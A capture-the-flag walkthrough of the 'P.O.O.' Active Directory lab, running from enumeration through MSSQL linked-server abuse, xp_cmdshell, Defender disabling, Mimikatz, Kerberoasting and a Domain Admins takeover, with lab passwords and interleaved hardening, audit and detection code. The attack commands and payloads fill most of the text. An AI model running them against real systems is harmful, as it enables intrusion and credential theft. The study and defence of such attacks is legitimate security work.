Introduction
Professional Offensive Operations
Professional Offensive Operations is a rising name in the cyber security world.
Lately they have been working on migrating core services and components to a state-of-the-art cluster that offers cutting-edge software and hardware.
P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment configured with the latest operating systems and technologies.
The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.
Entry Point: 10.13.38.11
Enumeration
ping -c 1 10.13.38.11 -R
NMAP Scans
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts
nmap -p80,1433 -sCV 10.13.38.11 -oN targeted
# Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11
Nmap scan report for 10.13.38.11
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| 10.13.38.11:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-29T19:52:54
|_Not valid after: 2054-03-29T19:52:54
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds
Bruteforce Directories
dirsearch -u 10.13.38.11
.DS_Store Directory Enumeration
python ds_walk.py -u http://10.13.38.11
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11/admin
[!] http://10.13.38.11/dev
[!] http://10.13.38.11/iisstart.htm
[!] http://10.13.38.11/Images
[!] http://10.13.38.11/JS
[!] http://10.13.38.11/META-INF
[!] http://10.13.38.11/New folder
[!] http://10.13.38.11/New folder (2)
[!] http://10.13.38.11/Plugins
[!] http://10.13.38.11/Templates
[!] http://10.13.38.11/Themes
[!] http://10.13.38.11/Uploads
[!] http://10.13.38.11/web.config
[!] http://10.13.38.11/Widgets
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11/Images/buttons
[!] http://10.13.38.11/Images/icons
[!] http://10.13.38.11/Images/iisstart.png
----------------------------
[!] http://10.13.38.11/JS/custom
----------------------------
[!] http://10.13.38.11/Themes/default
----------------------------
[!] http://10.13.38.11/Widgets/CalendarEvents
[!] http://10.13.38.11/Widgets/Framework
[!] http://10.13.38.11/Widgets/Menu
[!] http://10.13.38.11/Widgets/Notifications
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts/custom
[!] http://10.13.38.11/Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.
IIS Shortname Scanner
python3 iis_shortname_scanner.py http://10.13.38.11/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
poo_co~1.txt
_co%%%%
Path bruteforce with WFUZZ
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt
wc -l co_fuzz.txt
wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404
curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt
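The three findings above (TRACE allowed per the nmap output, a .DS_Store file served from the web root, and 8.3 short-name disclosure via the tilde probe) are all addressed by IIS request filtering. The web.config fragment below is an added hardening example, not a file from the lab or from the writeup; it assumes IIS 10 with the default request-filtering module and goes under the site's `<system.webServer>` element.

```xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Added hardening example (hypothetical site config, not the lab's web.config). -->
<configuration>
  <system.webServer>
    <security>
      <requestFiltering>
        <!-- Reject any URL segment named .DS_Store. macOS writes this metadata file
             into every folder it touches and it lists every sibling entry, which is
             how the otherwise unguessable /dev/<hash> directories were recovered.
             (web.config is already in the default hiddenSegments list.) -->
        <hiddenSegments>
          <add segment=".DS_Store" />
        </hiddenSegments>
        <!-- Refuse the tilde sequence that short-name probing (poo_co~1.txt) relies on. -->
        <denyUrlSequences>
          <add sequence="~" />
        </denyUrlSequences>
        <!-- Nmap flagged TRACE as a potentially risky allowed method; disallow it. -->
        <verbs allowUnlisted="true">
          <add verb="TRACE" allowed="false" />
        </verbs>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
```

Two caveats: denying `~` breaks any application that legitimately uses a tilde in URLs, so check the site's routes first; and the filter only hides the probe, the 8.3 names still exist on disk. Disabling short-name generation on the volume (`fsutil 8dot3name set 1`) stops new ones being created, but files that already have a short name keep it until they are recreated.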
MSSQL Enumeration / Linkcrawler
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run
search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
Installing usql as an MSSQL client
go install -tags most github.com/xo/usql@latest
usql
\c mssql://external_user@10.13.38.11:1433
#p00Public3xt3rnalUs3r#
MSSQL Enumeration
SELECT name FROM sys.databases;
SELECT suser_name();
SELECT name,sysadmin FROM syslogins;
SELECT srvname, isremote FROM sysservers;
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')');
Adding a Login to the DB
EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
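The linked-server hop above works because of three configuration facts: the links are reachable from a low-privileged login, the link back to POO_PUBLIC runs as a remote login that is sysadmin there, and "rpc out" is enabled so EXECUTE ... AT is accepted. The T-SQL below is an added audit script, not part of the writeup or the lab; it assumes sysadmin on the instance being audited and the instance names shown on this page, and it pulls the same information from the catalog views a DBA would check.

```sql
-- Added audit example (not the lab's or the writeup's code). Run on each instance.

-- 1. Linked servers, and whether they accept EXECUTE ... AT (rpc out) or OPENQUERY (data access)
SELECT s.name, s.product, s.provider, s.data_source,
       s.is_rpc_out_enabled, s.is_data_access_enabled
FROM sys.servers AS s
WHERE s.is_linked = 1;

-- 2. Login mapping per link. uses_self_credential = 1 forwards the caller's own identity;
--    a fixed remote_name that is sysadmin on the target is what turns a low-privileged
--    caller into a remote sysadmin. local_principal_id 0 means "every local login".
SELECT s.name AS linked_server,
       ISNULL(p.name, '<all logins>') AS local_login,
       l.uses_self_credential,
       l.remote_name
FROM sys.linked_logins AS l
JOIN sys.servers AS s ON s.server_id = l.server_id
LEFT JOIN sys.server_principals AS p ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1;

-- 3. Surface-area options that turn a SQL login into OS command execution
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'external scripts enabled',
               'Ole Automation Procedures', 'Ad Hoc Distributed Queries');

-- 4. sysadmin members with creation time, so a login added through a link stands out
SELECT p.name, p.type_desc, p.create_date
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS p ON p.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY p.create_date DESC;

-- Remediation where the audit shows a problem (instance names are the page's, as an example):
-- EXEC sp_serveroption @server = N'COMPATIBILITY\POO_PUBLIC', @optname = N'rpc out', @optvalue = N'false';
-- EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
-- EXEC sp_configure 'external scripts enabled', 0; RECONFIGURE;
```

The link in query 2 is the one to remap: either set it to use the caller's own credential, or map it to a dedicated remote login that holds only the permissions the application needs, never sysadmin.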
Check Username
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run
XP_cmdshell
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'whoami';
go
Enabling external scripts
EXEC sp_configure 'external scripts enabled', 1
reconfigure
go
Using external scripts (example)
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("whoami")'
go
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")'
go
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("netstat -ano")'
go
echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts
Evil-WinRM
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O."
net user administrator
Set-MpPreference -DisableRealtimeMonitoring $true
Mimikatz.exe
.\mimikatz.exe token::elevate lsadump::cache exit
Invoke-Kerberoast.ps1
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'powershell -exec bypass -c "Import-Module C:\temp\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat hashcat | fl"'
go
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo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
hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt
Sharphound
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'cd C:\temp && SharpHound.exe -c all'
go
PowerView.ps1
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s .
$user = 'intranet.poo\p00_adm'
$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred
# Equivalent, building the credential with the constructor form
$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
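Three of the post-exploitation steps in this writeup leave distinct traces in Windows event logs: the Kerberoast request produces a 4769 with RC4 encryption (the `$krb5tgs$23$` prefix of the cracked hash is etype 23, RC4-HMAC), the `Set-MpPreference -DisableRealtimeMonitoring` call is captured by PowerShell script-block logging (4104), and the Domain Admins change above is a 4728. The script below is an added detection example, not part of the writeup; the events are constructed dicts modelled on those event IDs' fields, and the rule names and thresholds are my own.

```python
"""Detection rules over constructed Windows events for three actions seen in the writeup:
RC4 service-ticket requests (Kerberoasting), Defender real-time protection being disabled,
and a member being added to a privileged group. Added example; sample events are made up."""
import re
from collections import defaultdict

RC4_HMAC = "0x17"                       # etype 23, the only crackable-offline ticket type
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "administrators", "schema admins"}
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+.*-Disable\w+", re.IGNORECASE)

# Constructed sample events (not real logs from the lab), keyed like the XML event fields.
SAMPLE_EVENTS = [
    # AES service ticket for a user SPN: normal traffic
    {"EventID": 4769, "TargetUserName": "3ky@INTRANET.POO", "ServiceName": "cyber_audit",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.13.38.11"},
    # RC4 service ticket for the same SPN: what Invoke-Kerberoast requests
    {"EventID": 4769, "TargetUserName": "3ky@INTRANET.POO", "ServiceName": "cyber_audit",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.13.38.11"},
    # RC4 ticket for krbtgt is a TGT operation, not a roast
    {"EventID": 4769, "TargetUserName": "3ky@INTRANET.POO", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.13.38.11"},
    # Machine accounts have long random passwords; their tickets are not worth alerting on
    {"EventID": 4769, "TargetUserName": "3ky@INTRANET.POO", "ServiceName": "COMPATIBILITY$",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.13.38.11"},
    # PowerShell script-block logging: tamper versus a harmless read of the same setting
    {"EventID": 4104, "Computer": "COMPATIBILITY.intranet.poo",
     "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"EventID": 4104, "Computer": "COMPATIBILITY.intranet.poo",
     "ScriptBlockText": "Get-MpPreference | Select-Object DisableRealtimeMonitoring"},
    # Group membership changes: privileged group versus an ordinary one
    {"EventID": 4728, "TargetUserName": "Domain Admins", "SubjectUserName": "p00_adm",
     "MemberName": "CN=p00_adm,CN=Users,DC=intranet,DC=poo"},
    {"EventID": 4728, "TargetUserName": "Marketing", "SubjectUserName": "p00_adm",
     "MemberName": "CN=p00_hr,CN=Users,DC=intranet,DC=poo"},
]


def is_kerberoast_candidate(ev):
    """Successful RC4 TGS request for a user-account SPN (not krbtgt, not a machine account)."""
    if ev.get("EventID") != 4769:
        return False
    service = ev.get("ServiceName", "")
    if service.lower() == "krbtgt" or service.endswith("$"):
        return False
    return (ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and ev.get("Status", "0x0") == "0x0")


def is_defender_tamper(ev):
    """Script block that switches off a Defender protection feature."""
    return ev.get("EventID") == 4104 and bool(DEFENDER_TAMPER.search(ev.get("ScriptBlockText", "")))


def is_privileged_group_change(ev):
    """Member added to a security-enabled global (4728) or universal (4756) privileged group."""
    return (ev.get("EventID") in (4728, 4756)
            and ev.get("TargetUserName", "").lower() in PRIVILEGED_GROUPS)


def detect(events, roast_threshold=1):
    """Return a list of alert dicts. RC4 requests are aggregated per (source IP, requester)
    so that roast_threshold can be raised to 'many distinct SPNs' in a noisy environment."""
    alerts = []
    rc4_by_source = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            rc4_by_source[(ev.get("IpAddress"), ev.get("TargetUserName"))].add(ev.get("ServiceName", ""))
        if is_defender_tamper(ev):
            alerts.append({"rule": "defender_realtime_disabled",
                           "host": ev.get("Computer"), "script": ev.get("ScriptBlockText")})
        if is_privileged_group_change(ev):
            alerts.append({"rule": "privileged_group_member_added", "group": ev.get("TargetUserName"),
                           "member": ev.get("MemberName"), "by": ev.get("SubjectUserName")})
    for (source, requester), services in rc4_by_source.items():
        if len(services) >= roast_threshold:
            alerts.append({"rule": "kerberoast_rc4_tgs", "source": source,
                           "requester": requester, "services": sorted(services)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The RC4 rule is the weakest of the three on its own: a domain that still has accounts without AES keys will generate legitimate 0x17 tickets, so in practice raise `roast_threshold` and pair the rule with the fix (set `msDS-SupportedEncryptionTypes` to AES-only on service accounts and give them long random passwords, which is what makes the hash uncrackable in the first place). The other two rules are high-confidence on their own.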